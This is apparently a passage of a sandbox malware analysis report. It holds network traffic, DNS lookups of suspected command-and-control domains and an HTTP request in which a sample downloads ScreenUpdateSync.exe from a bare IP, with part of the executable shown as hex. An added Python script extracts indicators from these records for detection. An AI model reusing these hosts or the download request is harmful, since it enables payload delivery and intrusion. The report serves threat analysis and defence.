                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.619362116 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.619472980 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.619618893 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.620292902 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.620368004 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.620517015 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.622198105 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.622296095 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.622334957 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.624134064 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.624151945 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.624196053 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.624401093 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.626038074 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.626086950 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.626138926 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.627899885 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.628010035 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.628086090 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.629729986 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.629793882 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.629878998 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.631567955 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.631671906 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.631771088 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.633335114 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.633358955 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.633398056 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.633436918 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.635305882 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.635483027 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.635560989 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.637516975 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.637536049 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.637670040 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.638633013 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.638755083 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.638829947 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.640328884 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.640444040 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.640516043 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.642067909 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.642173052 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.642232895 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.643836021 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.643944979 CET8049726176.113.115.19192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:21.644004107 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.509705067 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.509776115 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541773081 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541826010 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541851997 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541872025 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541918993 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.541925907 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.542047977 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.542089939 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.568550110 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.568583965 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.568598986 CET49768443192.168.2.623.55.153.106
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:34.568605900 CET4434976823.55.153.106192.168.2.6
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:06.702718973 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:07.041064024 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:07.796236992 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:09.296180010 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:11.978360891 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:17.345446110 CET4972680192.168.2.6176.113.115.19
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:18:28.001127958 CET4972680192.168.2.6176.113.115.19
Timestamp                              Source Port  Dest Port  Source IP    Dest IP
Dec 14, 2024 14:16:16.734160900 CET    57798        53         192.168.2.6  1.1.1.1
Dec 14, 2024 14:16:16.967303991 CET    53           57798      1.1.1.1      192.168.2.6
Dec 14, 2024 14:16:25.760174036 CET    63859        53         192.168.2.6  1.1.1.1
Dec 14, 2024 14:16:25.980165958 CET    53           63859      1.1.1.1      192.168.2.6
Dec 14, 2024 14:16:25.984570980 CET    64353        53         192.168.2.6  1.1.1.1
Dec 14, 2024 14:16:26.126239061 CET    53           64353      1.1.1.1      192.168.2.6
Dec 14, 2024 14:16:28.412658930 CET    54461        53         192.168.2.6  1.1.1.1
Dec 14, 2024 14:16:28.631895065 CET    53           54461      1.1.1.1      192.168.2.6
Dec 14, 2024 14:16:30.739912987 CET    49493        53         192.168.2.6  1.1.1.1
Dec 14, 2024 14:16:30.963659048 CET    53           49493      1.1.1.1      192.168.2.6
Dec 14, 2024 14:16:30.999936104 CET    56428        53         192.168.2.6  1.1.1.1
Dec 14, 2024 14:16:31.219702005 CET    53           56428      1.1.1.1      192.168.2.6
Dec 14, 2024 14:16:31.222907066 CET    51288        53         192.168.2.6  1.1.1.1
Dec 14, 2024 14:16:31.446413040 CET    53           51288      1.1.1.1      192.168.2.6
Dec 14, 2024 14:16:31.448194027 CET    64555        53         192.168.2.6  1.1.1.1
Dec 14, 2024 14:16:31.669308901 CET    53           64555      1.1.1.1      192.168.2.6
Dec 14, 2024 14:16:31.670892954 CET    62214        53         192.168.2.6  1.1.1.1
Dec 14, 2024 14:16:31.894764900 CET    53           62214      1.1.1.1      192.168.2.6
Dec 14, 2024 14:16:31.897603035 CET    52796        53         192.168.2.6  1.1.1.1
Dec 14, 2024 14:16:32.035258055 CET    53           52796      1.1.1.1      192.168.2.6
Dec 14, 2024 14:16:32.038180113 CET    52095        53         192.168.2.6  1.1.1.1
Dec 14, 2024 14:16:32.175375938 CET    53           52095      1.1.1.1      192.168.2.6
Timestamp                              Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Dec 14, 2024 14:16:16.734160900 CET    192.168.2.6  1.1.1.1  0x793c    Standard query (0)  post-to-me.com       A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:25.760174036 CET    192.168.2.6  1.1.1.1  0xab7c    Standard query (0)  sordid-snaked.cyou   A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:25.984570980 CET    192.168.2.6  1.1.1.1  0x38dd    Standard query (0)  immureprech.biz      A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:28.412658930 CET    192.168.2.6  1.1.1.1  0xcb78    Standard query (0)  deafeninggeh.biz     A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:30.739912987 CET    192.168.2.6  1.1.1.1  0x2ea3    Standard query (0)  effecterectz.xyz     A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:30.999936104 CET    192.168.2.6  1.1.1.1  0x1750    Standard query (0)  diffuculttan.xyz     A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:31.222907066 CET    192.168.2.6  1.1.1.1  0x621e    Standard query (0)  debonairnukk.xyz     A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:31.448194027 CET    192.168.2.6  1.1.1.1  0xc1db    Standard query (0)  wrathful-jammy.cyou  A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:31.670892954 CET    192.168.2.6  1.1.1.1  0xe0b6    Standard query (0)  awake-weaves.cyou    A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:31.897603035 CET    192.168.2.6  1.1.1.1  0x6d7b    Standard query (0)  sordid-snaked.cyou   A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:32.038180113 CET    192.168.2.6  1.1.1.1  0x8d7f    Standard query (0)  steamcommunity.com   A (IP address)  IN (0x0001)  false
Timestamp                              Source IP  Dest IP      Trans ID  Reply Code      Name                 CName  Address         Type            Class        DNS over HTTPS
Dec 14, 2024 14:16:16.967303991 CET    1.1.1.1    192.168.2.6  0x793c    No error (0)    post-to-me.com       -      104.21.56.70    A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:16.967303991 CET    1.1.1.1    192.168.2.6  0x793c    No error (0)    post-to-me.com       -      172.67.179.207  A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:25.980165958 CET    1.1.1.1    192.168.2.6  0xab7c    Name error (3)  sordid-snaked.cyou   none   none            A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:26.126239061 CET    1.1.1.1    192.168.2.6  0x38dd    No error (0)    immureprech.biz      -      104.21.22.222   A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:26.126239061 CET    1.1.1.1    192.168.2.6  0x38dd    No error (0)    immureprech.biz      -      172.67.207.38   A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:28.631895065 CET    1.1.1.1    192.168.2.6  0xcb78    No error (0)    deafeninggeh.biz     -      104.21.96.1     A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:28.631895065 CET    1.1.1.1    192.168.2.6  0xcb78    No error (0)    deafeninggeh.biz     -      104.21.32.1     A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:28.631895065 CET    1.1.1.1    192.168.2.6  0xcb78    No error (0)    deafeninggeh.biz     -      104.21.48.1     A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:28.631895065 CET    1.1.1.1    192.168.2.6  0xcb78    No error (0)    deafeninggeh.biz     -      104.21.64.1     A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:28.631895065 CET    1.1.1.1    192.168.2.6  0xcb78    No error (0)    deafeninggeh.biz     -      104.21.112.1    A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:28.631895065 CET    1.1.1.1    192.168.2.6  0xcb78    No error (0)    deafeninggeh.biz     -      104.21.80.1     A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:28.631895065 CET    1.1.1.1    192.168.2.6  0xcb78    No error (0)    deafeninggeh.biz     -      104.21.16.1     A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:30.963659048 CET    1.1.1.1    192.168.2.6  0x2ea3    Name error (3)  effecterectz.xyz     none   none            A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:31.219702005 CET    1.1.1.1    192.168.2.6  0x1750    Name error (3)  diffuculttan.xyz     none   none            A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:31.446413040 CET    1.1.1.1    192.168.2.6  0x621e    Name error (3)  debonairnukk.xyz     none   none            A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:31.669308901 CET    1.1.1.1    192.168.2.6  0xc1db    Name error (3)  wrathful-jammy.cyou  none   none            A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:31.894764900 CET    1.1.1.1    192.168.2.6  0xe0b6    Name error (3)  awake-weaves.cyou    none   none            A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:32.035258055 CET    1.1.1.1    192.168.2.6  0x6d7b    Name error (3)  sordid-snaked.cyou   none   none            A (IP address)  IN (0x0001)  false
Dec 14, 2024 14:16:32.175375938 CET    1.1.1.1    192.168.2.6  0x8d7f    No error (0)    steamcommunity.com   -      23.55.153.106   A (IP address)  IN (0x0001)  false
• post-to-me.com
• immureprech.biz
• deafeninggeh.biz
• steamcommunity.com
• 176.113.115.19
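The DNS answer table and the HTTP session in this report show a pattern worth turning into a check: between 14:16:25 and 14:16:32 the sample receives seven NXDOMAIN answers for six distinct .cyou/.xyz names, a few .biz domains and post-to-me.com do resolve, and the sample fetches ScreenUpdateSync.exe from the bare IP 176.113.115.19 with the non-browser User-Agent "ShareScreen". The script below is an added example and not part of the Joe Sandbox report or its tooling. It parses records in the report's column layout (constructed here as tab-separated rows with ISO timestamps, since the rendered report fuses the columns) and emits an indicator list plus two heuristics: NXDOMAIN cycling (several distinct names failing within a short window) and an executable fetched from an IP literal by a non-browser client. The thresholds (three failures in ten seconds) and the browser User-Agent prefixes are my assumptions, not values taken from the report.

```python
"""Indicator extraction over sandbox DNS-answer and HTTP records (added example,
not part of the Joe Sandbox report). The records are constructed to mirror the
report's DNS answer table and HTTP request, tab-separated with ISO timestamps."""
import ipaddress
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Set

# Constructed rows: ts, src, dst, txid, reply, name, cname, address, type
DNS_ANSWERS = """\
2024-12-14T14:16:16.967\t1.1.1.1\t192.168.2.6\t0x793c\tNo error (0)\tpost-to-me.com\t\t104.21.56.70\tA
2024-12-14T14:16:16.967\t1.1.1.1\t192.168.2.6\t0x793c\tNo error (0)\tpost-to-me.com\t\t172.67.179.207\tA
2024-12-14T14:16:25.980\t1.1.1.1\t192.168.2.6\t0xab7c\tName error (3)\tsordid-snaked.cyou\tnone\tnone\tA
2024-12-14T14:16:26.126\t1.1.1.1\t192.168.2.6\t0x38dd\tNo error (0)\timmureprech.biz\t\t104.21.22.222\tA
2024-12-14T14:16:30.963\t1.1.1.1\t192.168.2.6\t0x2ea3\tName error (3)\teffecterectz.xyz\tnone\tnone\tA
2024-12-14T14:16:31.219\t1.1.1.1\t192.168.2.6\t0x1750\tName error (3)\tdiffuculttan.xyz\tnone\tnone\tA
2024-12-14T14:16:32.175\t1.1.1.1\t192.168.2.6\t0x8d7f\tNo error (0)\tsteamcommunity.com\t\t23.55.153.106\tA
"""

# Constructed copy of the captured request line and headers.
HTTP_REQUEST = """\
GET /ScreenUpdateSync.exe HTTP/1.1
User-Agent: ShareScreen
Host: 176.113.115.19
"""

# Assumption: a browser's User-Agent starts with one of these prefixes.
BROWSER_UA_PREFIXES = ("Mozilla/", "Opera/")


@dataclass
class DnsAnswer:
    ts: datetime
    name: str
    rcode: int      # 0 = NOERROR, 3 = NXDOMAIN
    address: str    # "" or "none" when nothing resolved


def parse_dns_answers(text: str) -> List[DnsAnswer]:
    """Parse the tab-separated rows; the rcode is the number in the reply column."""
    out = []
    for line in text.strip().splitlines():
        ts, _src, _dst, _txid, reply, name, _cname, addr, _rtype = line.split("\t")
        rcode = int(reply[reply.rindex("(") + 1:reply.rindex(")")])
        out.append(DnsAnswer(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f"), name, rcode, addr))
    return out


def summarize_dns(answers: List[DnsAnswer], window_s: float = 10.0, min_failures: int = 3) -> dict:
    """Group addresses per name, list NXDOMAIN names in order, and flag fallback cycling:
    >= min_failures distinct names failing inside window_s seconds (a client walking a C2 list)."""
    resolved: Dict[str, Set[str]] = {}
    failed: List[DnsAnswer] = []
    for a in answers:
        if a.rcode == 0 and a.address not in ("", "none"):
            resolved.setdefault(a.name, set()).add(a.address)
        elif a.rcode == 3:
            failed.append(a)
    nx_names = []
    for a in failed:
        if a.name not in nx_names:
            nx_names.append(a.name)
    cycling = any(
        len({b.name for b in failed[i:] if (b.ts - a.ts).total_seconds() <= window_s}) >= min_failures
        for i, a in enumerate(failed)
    )
    return {"resolved": resolved, "nxdomain": nx_names, "fallback_cycling": cycling}


def analyze_http_request(raw: str) -> dict:
    """Parse request line plus headers; flag traits of a payload download."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        key, _, value = h.partition(":")
        headers[key.strip().lower()] = value.strip()
    host, ua = headers.get("host", ""), headers.get("user-agent", "")
    flags = set()
    try:
        ipaddress.ip_address(host)
        flags.add("host_is_ip")          # no hostname at all, only an IP literal
    except ValueError:
        pass
    if path.lower().endswith((".exe", ".dll", ".scr")):
        flags.add("executable_download")
    if ua and not ua.startswith(BROWSER_UA_PREFIXES):
        flags.add("non_browser_user_agent")
    return {"method": method, "path": path, "host": host, "user_agent": ua,
            "url": f"http://{host}{path}", "flags": flags}


def extract_iocs(dns_text: str, http_text: str) -> dict:
    """Merge both sources into one indicator set."""
    dns = summarize_dns(parse_dns_answers(dns_text))
    http = analyze_http_request(http_text)
    ips = sorted({ip for addrs in dns["resolved"].values() for ip in addrs})
    if "host_is_ip" in http["flags"]:
        ips.append(http["host"])
    return {"domains": sorted(dns["resolved"]) + dns["nxdomain"], "ips": ips,
            "urls": [http["url"]], "user_agents": [http["user_agent"]],
            "fallback_cycling": dns["fallback_cycling"], "http_flags": sorted(http["flags"])}
```

Calling extract_iocs(DNS_ANSWERS, HTTP_REQUEST) returns every resolved and failed name, including steamcommunity.com, because the sample did resolve it; the script does not decide which names are C2, dead drops or collateral, that is a triage decision. The cycling heuristic deliberately counts distinct names rather than answers, so the repeated sordid-snaked.cyou lookup in the report does not inflate the count.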
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49726        176.113.115.19  80                7476  C:\Users\user\Desktop\rHrG691f7q.exe
Timestamp                              Bytes transferred  Direction  Data
Dec 14, 2024 14:16:19.343600988 CET    85                 OUT
    GET /ScreenUpdateSync.exe HTTP/1.1
    User-Agent: ShareScreen
    Host: 176.113.115.19
Dec 14, 2024 14:16:20.657592058 CET    1236               IN
    HTTP/1.1 200 OK
    Date: Sat, 14 Dec 2024 13:16:20 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Sat, 14 Dec 2024 13:15:01 GMT
    ETag: "58600-6293abc281063"
    Accept-Ranges: bytes
    Content-Length: 361984
    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 17 cd 9e a9 53 ac f0 fa 53 ac f0 fa 53 ac f0 fa ee e3 66 fa 52 ac f0 fa 4d fe 74 fa 4d ac f0 fa 4d fe 65 fa 47 ac f0 fa 4d fe 73 fa 3d ac f0 fa 74 6a 8b fa 5a ac f0 fa 53 ac f1 fa 20 ac f0 fa 4d fe 7a fa 52 ac f0 fa 4d fe 64 fa 52 ac f0 fa 4d fe 61 fa 52 ac f0 fa 52 69 63 68 53 ac f0 fa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 e7 de 32 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f8 03 00 00 0e 3f 00 00 00 00 00 5c 18 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 43 00 00 04 00 00 9e c3 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$SSSfRMtMMeGMs=tjZS MzRMdRMaRRichSPEL2e?\@Cl)PB0.textl `.rdataL"$@@.data=@p @.rsrc0B@@
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.657635927 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 5c 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 51 08 00 00 6a 0c 68 50 25 44 00 e8 7b 16 00 00 8b 75 08 85 f6 74 75 83 3d
                                                                                                                                                                                                                                                                  Data Ascii: %\D;@DuQjhP%D{utu=uCjkYeVYEtVPYYE}u7ujWYVj54nDDu"DPY?UQeVEPuu
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658616066 CET1236INData Raw: e8 cf 17 00 00 8b f0 83 c4 0c 85 f6 75 18 39 45 fc 74 13 e8 de 08 00 00 85 c0 74 0a e8 d5 08 00 00 8b 4d fc 89 08 8b c6 5e c9 c3 8b ff 55 8b ec 8b 45 08 56 8b f1 c6 46 0c 00 85 c0 75 63 e8 7e 25 00 00 89 46 08 8b 48 6c 89 0e 8b 48 68 89 4e 04 8b
                                                                                                                                                                                                                                                                  Data Ascii: u9EttM^UEVFuc~%FHlHhN;HDtGDHpu"F;FDtFGDHpuFF@puHpF@F^]U3W;t3f;y9Mp8huM?Ex
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658662081 CET1236INData Raw: 82 83 00 00 00 8b de 2b df 8d 43 04 83 f8 04 72 77 57 e8 ec 30 00 00 8b f8 8d 43 04 59 3b f8 73 48 b8 00 08 00 00 3b f8 73 02 8b c7 03 c7 3b c7 72 0f 50 ff 75 fc e8 7a 30 00 00 59 59 85 c0 75 16 8d 47 10 3b c7 72 40 50 ff 75 fc e8 64 30 00 00 59
                                                                                                                                                                                                                                                                  Data Ascii: +CrwW0CY;sH;s;rPuz0YYuG;r@Pud0YYt1P4YluVYhEY3_^[Vjj /VlhujX^&3^jh%DD6%euYEEE`
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658674955 CET1236INData Raw: 33 c0 40 5f 5e c3 83 24 f5 88 41 44 00 00 33 c0 eb f1 8b ff 53 8b 1d cc 10 44 00 56 be 88 41 44 00 57 8b 3e 85 ff 74 13 83 7e 04 01 74 0d 57 ff d3 57 e8 7e f5 ff ff 83 26 00 59 83 c6 08 81 fe a8 42 44 00 7c dc be 88 41 44 00 5f 8b 06 85 c0 74 09
                                                                                                                                                                                                                                                                  Data Ascii: 3@_^$AD3SDVADW>t~tWW~&YBD|AD_t~uPBD|^[UE4ADD]jh%D3G}394nDu$j'#hi YYu4AD9tnj*Y;uu3QjYY]9u,h
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658818960 CET1236INData Raw: 14 50 ff 35 80 b4 81 00 57 ff 35 34 6e 44 00 ff 15 dc 10 44 00 3b c7 75 04 33 c0 eb 78 83 05 8c b4 81 00 10 8b 35 7c b4 81 00 a3 80 b4 81 00 6b f6 14 03 35 80 b4 81 00 68 c4 41 00 00 6a 08 ff 35 34 6e 44 00 ff 15 a8 10 44 00 89 46 10 3b c7 74 c7
                                                                                                                                                                                                                                                                  Data Ascii: P5W54nDD;u3x5|k5hAj54nDDF;tjh hWDF;uvW54nDDN>~|F_^UQQMASVqW3C}i0Dj?EZ@@JujhyhWD
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658829927 CET1236INData Raw: 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d8 72 e8 3b d8 75 7f 8b 1d 80 b4 81 00 eb 11 8b 53 04 8b 3b 23 55 f8 23 fe 0b d7 75 0a 83 c3 14 89 5d 08 3b d9 72 e8 3b d9 75 5b eb 0c 83 7b 08 00 75 0a 83 c3 14 89 5d 08 3b d8 72 f0 3b d8 75
                                                                                                                                                                                                                                                                  Data Ascii: ;#U#u];r;uS;#U#u];r;u[{u];r;u1{u];r;u]u3S:YKC8tCUt|D#M#u)eHD9#U#uEUi
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658842087 CET1236INData Raw: 33 f6 46 33 db 89 5d e4 83 fe e0 77 69 83 3d 94 b4 81 00 03 75 4b 83 c6 0f 83 e6 f0 89 75 0c 8b 45 08 3b 05 84 b4 81 00 77 37 6a 04 e8 96 f2 ff ff 59 89 7d fc ff 75 08 e8 9c fa ff ff 59 89 45 e4 c7 45 fc fe ff ff ff e8 5f 00 00 00 8b 5d e4 3b df
                                                                                                                                                                                                                                                                  Data Ascii: 3F3]wi=uKuE;w7jY}uYEE_];tuWS6.;uaVj54nDD;uL9=0sDt3VYrE;PE3uj:Y;uE;t8-t"ttHt3
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658854961 CET1236INData Raw: 00 00 8d 75 ef 8a 0e 84 c9 0f 84 c2 00 00 00 0f b6 46 ff 0f b6 c9 e9 a6 00 00 00 68 01 01 00 00 8d 43 1c 56 50 e8 96 29 00 00 8b 4d e4 83 c4 0c 6b c9 30 89 75 e0 8d b1 e8 46 44 00 89 75 e4 eb 2a 8a 46 01 84 c0 74 28 0f b6 3e 0f b6 c0 eb 12 8b 45
                                                                                                                                                                                                                                                                  Data Ascii: uFhCVP)Mk0uFDu*Ft(>EFDD;FG;v}FF>uuE}ur{CgjCCFDZf1Af0A@@JuL@;vFF~4C@IuCCSs
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.658963919 CET1236INData Raw: 00 00 00 85 c0 74 03 50 ff d6 8b 87 b8 00 00 00 85 c0 74 03 50 ff d6 8b 87 b4 00 00 00 85 c0 74 03 50 ff d6 8b 87 c0 00 00 00 85 c0 74 03 50 ff d6 8d 5f 50 c7 45 08 06 00 00 00 81 7b f8 d0 47 44 00 74 09 8b 03 85 c0 74 03 50 ff d6 83 7b fc 00 74
                                                                                                                                                                                                                                                                  Data Ascii: tPtPtPtP_PE{GDttP{tCtPMuP^[_]t7t3V0;t(W8YtVE>YuGDtVYY^3jhx&DT,GDFpt"~ltpluj Yg
                                                                                                                                                                                                                                                                  Dec 14, 2024 14:16:20.777564049 CET1236INData Raw: e8 46 e4 ff ff 59 c7 45 fc 01 00 00 00 8b 7e 6c 85 ff 74 23 57 e8 f3 fa ff ff 59 3b 3d b0 48 44 00 74 14 81 ff d8 47 44 00 74 0c 83 3f 00 75 07 57 e8 ff f8 ff ff 59 c7 45 fc fe ff ff ff e8 1e 00 00 00 56 e8 74 d8 ff ff 59 e8 3a ef ff ff c2 04 00
                                                                                                                                                                                                                                                                  Data Ascii: FYE~lt#WY;=HDtGDt?uWYEVtY:ujYujYVWpDV$DuVY^5HDhDWhDWoDhDWoDhDWoD=oD5DoDt=oDt=oDtu$D


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.6 | 49722       | 104.21.56.70   | 443              | 7476 | C:\Users\user\Desktop\rHrG691f7q.exe

Timestamp | Bytes transferred | Direction | Data
